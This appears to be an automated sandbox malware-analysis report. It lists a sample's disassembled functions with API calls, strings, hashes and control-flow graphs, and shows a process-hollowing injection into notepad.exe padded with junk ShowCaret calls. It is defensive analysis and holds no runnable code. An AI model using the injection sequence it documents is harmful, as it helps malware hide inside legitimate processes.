GetModuleFileNameA 7084->7086 7087 604b70 42 API calls 7085->7087 7086->7085 7088 607758 7086->7088 7089 60783a 7087->7089 7111 605ef8 7088->7111 7090 6072e4 42 API calls 7089->7090 7098 6077ed 7090->7098 7093 604b70 42 API calls 7094 6077db 7093->7094 7096 6072e4 42 API calls 7094->7096 7095 6039ec 11 API calls 7097 607866 7095->7097 7096->7098 7099 603a10 11 API calls 7097->7099 7098->7095 7100 607876 7099->7100 7101 6039ec 11 API calls 7100->7101 7102 60787e 7101->7102 7102->7074 7104 6072f0 7103->7104 7105 6064bc 42 API calls 7104->7105 7106 60731d 7105->7106 7107 603a40 11 API calls 7106->7107 7108 607328 7107->7108 7109 6039ec 11 API calls 7108->7109 7110 60733d 7109->7110 7110->7074 7112 605f0b 7111->7112 7113 603e44 11 API calls 7112->7113 7114 605f1d 7113->7114 7114->7093 7115 604c91 7130 602ed4 GetKeyboardType 7115->7130 7118 604cd7 7120 604cdc GetCommandLineA 7118->7120 7138 601164 GetStartupInfoA 7120->7138 7123 604d49 GetThreadLocale 7126 604bc8 12 API calls 7123->7126 7124 604d1c GetVersion 7125 604d38 GetThreadLocale 7124->7125 7129 604d2c GetCurrentThreadId 7124->7129 7140 604bc8 GetLocaleInfoA 7125->7140 7126->7129 7131 602ee3 GetKeyboardType 7130->7131 7132 602ef6 7130->7132 7131->7132 7132->7118 7133 602f04 RegOpenKeyExA 7132->7133 7134 602f7c 7133->7134 7135 602f2f RegQueryValueExA 7133->7135 7134->7118 7136 602f66 RegCloseKey 7135->7136 7136->7118 7139 60117a GetVersion 7138->7139 7139->7123 7139->7124 7141 604c03 7140->7141 7142 6039ec 11 API calls 7141->7142 7143 604c2d 7142->7143 7143->7129 7144 609492 CloseHandle CloseHandle 7145 6094af 7144->7145 7146 6034a0 4 API calls 7144->7146 7147 603a10 11 API calls 7145->7147 7146->7145 7148 6094cc 7147->7148 7149 6044b4 13 API calls 7148->7149 7150 6094da 7149->7150 6521 606e13 6522 6039ec 11 API calls 6521->6522 6523 606e3f GetThreadLocale 6522->6523 6540 606adc GetLocaleInfoA 6523->6540 6525 606e57 6526 606e70 6525->6526 6538 606ecf 6525->6538 6527 606ec1 6526->6527 6534 606e8c 6526->6534 6529 603a40 11 API calls 6527->6529 6528 606ebc 6531 603a10 11 API calls 6528->6531 6529->6528 6532 606fdd 6531->6532 6534->6528 6546 603bb8 6534->6546 6549 603c68 6534->6549 6537 603c68 11 API calls 6537->6538 6538->6528 6538->6537 6539 603bb8 11 API calls 6538->6539 6563 607bb4 6538->6563 6567 603e44 6538->6567 6539->6538 6541 606b03 6540->6541 6542 606b15 6540->6542 6543 603adc 11 API calls 6541->6543 6544 603a40 11 API calls 6542->6544 6545 606b13 6543->6545 6544->6545 6545->6525 6547 603adc 11 API calls 6546->6547 6548 603bc5 6547->6548 6548->6534 6550 603cab 6549->6550 6551 603c6c 6549->6551 6550->6534 6552 603c76 6551->6552 6558 603a40 6551->6558 6553 603ca0 6552->6553 6554 603c89 6552->6554 6559 603e84 11 API calls 6553->6559 6556 603e84 11 API calls 6554->6556 6555 603a82 6555->6534 6562 603c8e 6556->6562 6557 603a54 6557->6555 6561 6028b0 11 API calls 6557->6561 6558->6557 6560 603ab0 11 API calls 6558->6560 6559->6562 6560->6557 6561->6555 6562->6534 6564 607bea 6563->6564 6565 607bc8 6563->6565 6564->6538 6565->6564 6574 607b94 6565->6574 6568 603e76 6567->6568 6569 603e49 6567->6569 6570 6039ec 11 API calls 6568->6570 6569->6568 6571 603e5d 6569->6571 6573 603e6c 6570->6573 6572 603adc 11 API calls 6571->6572 6572->6573 6573->6538 6575 607ba0 CharNextA 6574->6575 6576 607baa 6574->6576 6575->6564 6576->6564 7151 601a9d 7152 601a84 7151->7152 7153 601a97 7152->7153 7154 601a8d LeaveCriticalSection 7152->7154 7154->7153

                                                                  Executed Functions

                                                                  Function 00401170 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 165injectionthreadmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ShowCaret.USER32(00000000), ref: 0040118E
                                                                  • NtUnmapViewOfSection.NTDLL(774B0000,0B813440,00000164,00400000,?,00000000), ref: 004011B3
                                                                  • ShowCaret.USER32(00000000), ref: 004011B7
                                                                  • VirtualAllocEx.KERNELBASE(756E0000,0030B70C,00000164,00400000,0004E000,00003000,00000040,?,00000000), ref: 004011EC
                                                                  • ShowCaret.USER32(00000000), ref: 004011F0
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,00400000,?,00000400,00000000,?,00000000), ref: 0040121B
                                                                  • ShowCaret.USER32(00000000), ref: 0040121F
                                                                  • ShowCaret.USER32(00000000), ref: 00401239
                                                                  • ShowCaret.USER32(00000000), ref: 0040125E
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,0004C000,00015A00,00001E00,00000000,?,00000000), ref: 00401299
                                                                  • ShowCaret.USER32(00000000), ref: 004012CA
                                                                  • ShowCaret.USER32(00000000), ref: 004012EE
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,7EFDDFF8,00407114,00000004,00000000,?,00000000), ref: 00401320
                                                                  • ShowCaret.USER32(00000000), ref: 00401324
                                                                  • ShowCaret.USER32(00000000), ref: 0040133B
                                                                  • Wow64SetThreadContext.KERNEL32(756E0000,00BA2230,00000168,00406620,?,00000000), ref: 0040135B
                                                                  • ShowCaret.USER32(00000000), ref: 0040135F
                                                                  • ResumeThread.KERNELBASE(756E0000,000BCC14,00000168,?,00000000), ref: 0040137A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretShow$MemoryProcessWrite$Thread$AllocContextResumeSectionUnmapViewVirtualWow64
                                                                  • String ID: Hq@$`p@
                                                                  • API String ID: 480950890-1281468770
                                                                  • Opcode ID: b6b0f8813bb7eff36c5e92e955d4611ca0407a266504072ab683b035350681cc
                                                                  • Instruction ID: 1cedc51185f688dccbac480823edada26e59cc5e99e7b06dbe20370140511c73
                                                                  • Opcode Fuzzy Hash: b6b0f8813bb7eff36c5e92e955d4611ca0407a266504072ab683b035350681cc
                                                                  • Instruction Fuzzy Hash: 2D510DF5610610AFD344EB59EE91F2637F9FB88704F028169F506E73A5C6B4B821CB68
                                                                  Function 00401600 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 138processlibrarystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 004015C0: GetCurrentProcess.KERNEL32(00000000,?,0040160D,?,00000000), ref: 004015D7
                                                                  • SHGetFolderPathW.SHELL32(00000000,-0000002A,00000000,00000000,?), ref: 00401635
                                                                  • lstrcatW.KERNEL32(?,\notepad.exe,?,00000000), ref: 00401645
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040165D
                                                                    • Part of subcall function 00401530: ShowCaret.USER32(00000000), ref: 0040154C
                                                                  • ShowCaret.USER32(00000000), ref: 0040169B
                                                                  • ShowCaret.USER32(00000000), ref: 0040169F
                                                                  • ShowCaret.USER32(00000000), ref: 004016C7
                                                                  • ShowCaret.USER32(00000000), ref: 004016E8
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004016F4
                                                                  • EnumResourceNamesA.KERNEL32(756E0000,02CAC166,00000000,00000015,00401040,00000000,?,00000000), ref: 00401721
                                                                    • Part of subcall function 00401390: ShowCaret.USER32(00000000), ref: 00401396
                                                                    • Part of subcall function 00401390: VirtualProtect.KERNELBASE(756E0000,0030C13C,00000000), ref: 00401433
                                                                  • ShowCaret.USER32(00000000), ref: 0040173B
                                                                  • CreateProcessW.KERNEL32(756E0000,002BAF82,?,00000000,?,00000000), ref: 00401782
                                                                  • ShowCaret.USER32(00000000), ref: 0040179A
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040118E
                                                                    • Part of subcall function 00401170: NtUnmapViewOfSection.NTDLL(774B0000,0B813440,00000164,00400000,?,00000000), ref: 004011B3
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 004011B7
                                                                    • Part of subcall function 00401170: VirtualAllocEx.KERNELBASE(756E0000,0030B70C,00000164,00400000,0004E000,00003000,00000040,?,00000000), ref: 004011EC
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 004011F0
                                                                    • Part of subcall function 00401170: WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,00400000,?,00000400,00000000,?,00000000), ref: 0040121B
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040121F
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 00401239
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040125E
                                                                    • Part of subcall function 00401170: WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,0004C000,00015A00,00001E00,00000000,?,00000000), ref: 00401299
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretShow$Process$MemoryVirtualWrite$AllocCreateCurrentEnumExecuteFolderLibraryLoadNamesPathProtectResourceSectionShellUnmapViewlstrcat
                                                                  • String ID: OPIOOUKHJJTY$\notepad.exe$advapi32.dll$open
                                                                  • API String ID: 1655093362-2236918752
                                                                  • Opcode ID: 1b204ab233147d46d13166e20a68fa83a0cf2c5b14558259fd0cdf6a8d0390c1
                                                                  • Instruction ID: 21d5881589ab2f9bb9e7312981c207e25e63c3dc4e9fed1a4688bf212c1fbff5
                                                                  • Opcode Fuzzy Hash: 1b204ab233147d46d13166e20a68fa83a0cf2c5b14558259fd0cdf6a8d0390c1
                                                                  • Instruction Fuzzy Hash: FC418AB1690300BFE210E760DD42F6B37E9E7C4B44F118539B605FB1E1D9B8A914876D
                                                                  Function 00401390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 50 401390-40143b ShowCaret call 4014c0 * 5 VirtualProtect
                                                                  APIs
                                                                  • ShowCaret.USER32(00000000), ref: 00401396
                                                                  • VirtualProtect.KERNELBASE(756E0000,0030C13C,00000000), ref: 00401433
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretProtectShowVirtual
                                                                  • String ID: 910$V/
                                                                  • API String ID: 3929742858-341175346
                                                                  • Opcode ID: baf9333768f30c66eaba00d9cb631bdcffc0c17c59462f0b4dfa1dc181a1cdd6
                                                                  • Instruction ID: 7adf0c5093f46c572695bcb1cc4dacb91342d891db2e85d7d2a02cab4f7e0da6
                                                                  • Opcode Fuzzy Hash: baf9333768f30c66eaba00d9cb631bdcffc0c17c59462f0b4dfa1dc181a1cdd6
                                                                  • Instruction Fuzzy Hash: 841151B5201210AFD250EBA5DD85F2777FCEB88754F124229FA0AE32A1C674BD108779
                                                                  Function 004037EF Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 65 4037ef-403800 66 403832-403856 HeapAlloc 65->66 67 403802-40381f HeapReAlloc 65->67 69 403882-403884 66->69 70 403858-403870 VirtualAlloc 66->70 68 403821-40382d 67->68 67->69 68->66 73 40389d-40389f 69->73 71 403872-40387c HeapFree 70->71 72 403886-40389b 70->72 71->69 72->73
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004035B7,00000000,?,?,?,00401836), ref: 00403817
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004035B7,00000000,?,?,?,00401836), ref: 0040384B
                                                                  • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00401836), ref: 00403865
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 0040387C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: f01af24e2874631ea2779b74758652f445791352bac989eab95b762f4ea42c63
                                                                  • Instruction ID: 6faec744670907b242940572656bc554ab04cd7dd9b01d2055736a1d5a4cc04c
                                                                  • Opcode Fuzzy Hash: f01af24e2874631ea2779b74758652f445791352bac989eab95b762f4ea42c63
                                                                  • Instruction Fuzzy Hash: AF116D712006209FD7209F18ED449267BF9FB44365711893AF152EA5F0D371A9A6CF48
                                                                  Function 00401966 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 74 401966-401975 call 401a0b 77 401977-401982 GetCurrentProcess TerminateProcess 74->77 78 401988-40199e 74->78 77->78 79 4019a0-4019a7 78->79 80 4019dc-4019f0 call 401a1d 78->80 82 4019a9-4019b5 79->82 83 4019cb-4019db call 401a1d 79->83 88 4019f2-4019f8 call 401a14 80->88 89 4019f9-401a03 ExitProcess 80->89 85 4019b7-4019bb 82->85 86 4019ca 82->86 83->80 90 4019bd 85->90 91 4019bf-4019c8 85->91 86->83 90->91 91->85 91->86
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,00401951,?,00000000,00000000,004018AF,00000000,00000000), ref: 0040197B
                                                                  • TerminateProcess.KERNEL32(00000000,?,00401951,?,00000000,00000000,004018AF,00000000,00000000), ref: 00401982
                                                                  • ExitProcess.KERNEL32 ref: 00401A03
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 71278d1f4220bcb8620912db61f9dc75cd8a913f590e7f49d4acebac21ec4584
                                                                  • Instruction ID: 6cdff9f0591df1e3503e952f8288832a1c9edc8ebce298b207857a9186d4ea9a
                                                                  • Opcode Fuzzy Hash: 71278d1f4220bcb8620912db61f9dc75cd8a913f590e7f49d4acebac21ec4584
                                                                  • Instruction Fuzzy Hash: BA01C0B12412019EDA109B69FE99A1EBBA4EB80350B11403FF4827B1F0CB399850DE6D
                                                                  Function 004022C9 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 4022c9-4022e7 HeapCreate 108 4022e9-4022f0 call 403152 107->108 109 4022fe-402300 107->109 112 402301-402304 108->112 113 4022f2-4022f8 HeapDestroy 108->113 113->109
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401824,00000001), ref: 004022DA
                                                                    • Part of subcall function 00403152: HeapAlloc.KERNEL32(00000000,00000140,004022EE), ref: 0040315F
                                                                  • HeapDestroy.KERNEL32 ref: 004022F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 60b094575c43ce829687a51dfa7d6f82ea7a4c2e4d015bc827a296030f121e6a
                                                                  • Instruction ID: 40c72eb45e5c1eccc1a22d81960c52d894ac1ab4987cbc5cee3b80ace42f3743
                                                                  • Opcode Fuzzy Hash: 60b094575c43ce829687a51dfa7d6f82ea7a4c2e4d015bc827a296030f121e6a
                                                                  • Instruction Fuzzy Hash: 57E01275610300AAFF101B31EF49B6B3AD5EB44782F058436B805E81E0E7B489D0A958
                                                                  Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 114 401000-401013 EndTask 115 401024 114->115 116 401015 114->116 117 401019-401022 116->117 117->115 117->117
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Task
                                                                  • String ID:
                                                                  • API String ID: 4065096731-0
                                                                  • Opcode ID: 14f1c2be7496dc62ca041e2660ef3e8e0519321bab3e56e9faf973b6ea3495f4
                                                                  • Instruction ID: 333b99c93a70b1c55f9c9043c7c8b5c49931c667e1abf1932cd73e56e3ef5478
                                                                  • Opcode Fuzzy Hash: 14f1c2be7496dc62ca041e2660ef3e8e0519321bab3e56e9faf973b6ea3495f4
                                                                  • Instruction Fuzzy Hash: 88D0A73C1483C159DA118E108811BA27B515F93B4CF2880DEE5C42F7E3C1365C47D725
                                                                  Function 004030C5 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 118 4030c5-4030d6 119 4030e5-4030ea 118->119 120 4030d8-4030da 118->120 121 403126-40312d 119->121 122 4030ec-4030f2 119->122 123 4030dc-4030de 120->123 124 4030df-4030e2 120->124 127 403148 121->127 128 40312f-403138 call 403ec6 121->128 125 403111-403124 HeapAlloc 122->125 126 4030f4-4030fc call 40268d call 4034e6 122->126 123->124 124->119 125->121 125->127 137 403101-40310f call 4026ee 126->137 130 40314a-40314d 127->130 135 40313a 128->135 136 40314e-403150 128->136 135->119 136->130 137->125 140 40313c-403145 call 403ef0 137->140 140->127
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(00000008,?,?,?,?,0040221A,00000001,00000074,?,00401836), ref: 0040311A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 4292702814-0
                                                                  • Opcode ID: be1dcb0f2ca5d9915bb146dd65e79aac8d54812c6b123a79e5cb88223f99ff47
                                                                  • Instruction ID: 63a47281f7fccb9a522bad3f45b21b828df9063caa348d8c451a67992f3c2ab6
                                                                  • Opcode Fuzzy Hash: be1dcb0f2ca5d9915bb146dd65e79aac8d54812c6b123a79e5cb88223f99ff47
                                                                  • Instruction Fuzzy Hash: 73019C33A0161027E9212E255D41B5F3A1D9B84BB7F1A0237FC507B3C2D67D8E0141DD

                                                                  Non-executed Functions

                                                                  Function 006047B8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 6047b8-6047f8 GetModuleFileNameA RegOpenKeyExA 145 60483a-60487d call 6045e0 RegQueryValueExA 144->145 146 6047fa-604816 RegOpenKeyExA 144->146 153 6048a1-6048bb RegCloseKey 145->153 154 60487f-60489b RegQueryValueExA 145->154 146->145 147 604818-604834 RegOpenKeyExA 146->147 147->145 149 6048c3-6048f4 lstrcpynA GetThreadLocale GetLocaleInfoA 147->149 151 6049f3-6049f9 149->151 152 6048fa-6048fe 149->152 155 604900-604904 152->155 156 60490a-604921 lstrlenA 152->156 154->153 157 60489d 154->157 155->151 155->156 159 604926-60492c 156->159 157->153 160 604939-604942 159->160 161 60492e-604937 159->161 160->151 163 604948-60494f 160->163 161->160 162 604923 161->162 162->159 164 604951-60497b lstrcpynA LoadLibraryExA 163->164 165 60497d-60497f 163->165 164->165 165->151 166 604981-604985 165->166 166->151 167 604987-6049bb lstrcpynA LoadLibraryExA 166->167 167->151 168 6049bd-6049f1 lstrcpynA LoadLibraryExA 167->168 168->151
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 021115018b862506af814cf2b311653b5a214d6eec4a7b788135a882baf68f3d
                                                                  • Instruction ID: 439e08d33a6fac8019160a22a772f9821e7e571ee344117f973a4ccba17bbda3
                                                                  • Opcode Fuzzy Hash: 021115018b862506af814cf2b311653b5a214d6eec4a7b788135a882baf68f3d
                                                                  • Instruction Fuzzy Hash: B26186B1E8424D7EEB29DAE4CC46FEFB7BD9B09300F4040A5B744E61C1DAB4DA458B54
                                                                  Function 006045E0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 277 6045e0-604606 GetModuleHandleA 278 604608-60461a GetProcAddress 277->278 279 60464c-604652 277->279 278->279 282 60461c-604631 278->282 280 604654-60465b 279->280 281 604695-60469b 279->281 283 604661-604675 call 6045b4 280->283 284 604788-604791 280->284 285 60469e-6046b8 lstrcpynA 281->285 282->279 289 604633-604647 lstrcpynA 282->289 283->284 293 60467b-60468d call 6045b4 283->293 288 604768-60476e 285->288 290 604774-604783 lstrcpynA 288->290 291 6046bd-6046d9 call 6045b4 288->291 289->284 290->284 291->284 297 6046df-60470b lstrcpynA FindFirstFileA 291->297 293->284 300 604693 293->300 297->284 299 60470d-60472a FindClose lstrlenA 297->299 299->284 301 60472c-604765 lstrcpynA lstrlenA 299->301 300->285 301->288
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0060593C,?,00000000), ref: 006045FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,0060593C,?,00000000), ref: 0060460E
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,00000000), ref: 00604642
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046B3
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046EE
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 00604701
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060470E
                                                                  • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060471A
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060474E
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060475A
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00604783
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
